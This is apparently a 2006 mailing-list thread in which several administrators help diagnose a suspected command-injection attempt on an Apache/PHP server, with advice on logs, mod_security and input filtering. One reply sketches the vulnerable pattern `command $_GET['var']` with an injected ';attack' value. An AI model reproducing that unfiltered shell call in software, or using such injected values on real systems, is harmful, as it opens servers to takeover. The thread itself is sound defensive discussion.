I've seen this type of thing with PHP; I was going to say something but I figured I would wait since you didn't mention it. Can you correlate the time/date/ip with the request from access.log? It might give you more information. I can say, that we get attacked regularly on Sarge and we're a relatively high volume site with the similar specs, and I've not seen anything like this as a standard hack - my experience is that this is most often caused by not filtering/validating forms, global PHP variables, or PHP scripting errors. I am very curious to know what's going on.
> -----Original Message----- > From: Josep Serrano [mailto:[EMAIL PROTECTED] > Sent: Wednesday, February 01, 2006 4:53 AM > To: [email protected] > Subject: RE: Weird message in my apache error log > > Hello guys, > > No, I can't think of any specific application. Yes this web server is > running a > couple of php scripts but that's it. > > Following your recommendations I have installed mod_security with the set > of > standard rules provided in www.modsecurity.org. I will be following up the > audit log > for any clues. > > Be sure that I have strange files, permissions, or open ports in this box. > I run > daily checks and I got the vaccines :-) > > Thanks, > Josep SERRANO. > > > What does your application do? It looks like it is finding a shell > script > > somewhere? We've seen similar things when executing CGI's and not > filtering > > the input data so well. The line 22, 24 make me think there is a script > > somewhere rather than arbitrary GET data. > > > >> -----Original Message----- > >> Looks like someone is trying to do arbritary commmand execution. You > >> probably have a script somewhere that says `command $_GET['var']`, and > >> someone is passing ';attack' as var, but it isn't quite working. > >> > >> I suggest using the audit log feature of mod_security, or just grepping > >> through your access logs for anything odd ('wget' is a good search > >> term). > >> > >> You might have a bot on the system, check for any odd network > >> connections, especially to port 6667 (IRC). Also look for www-data > owned > >> files in /tmp. > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
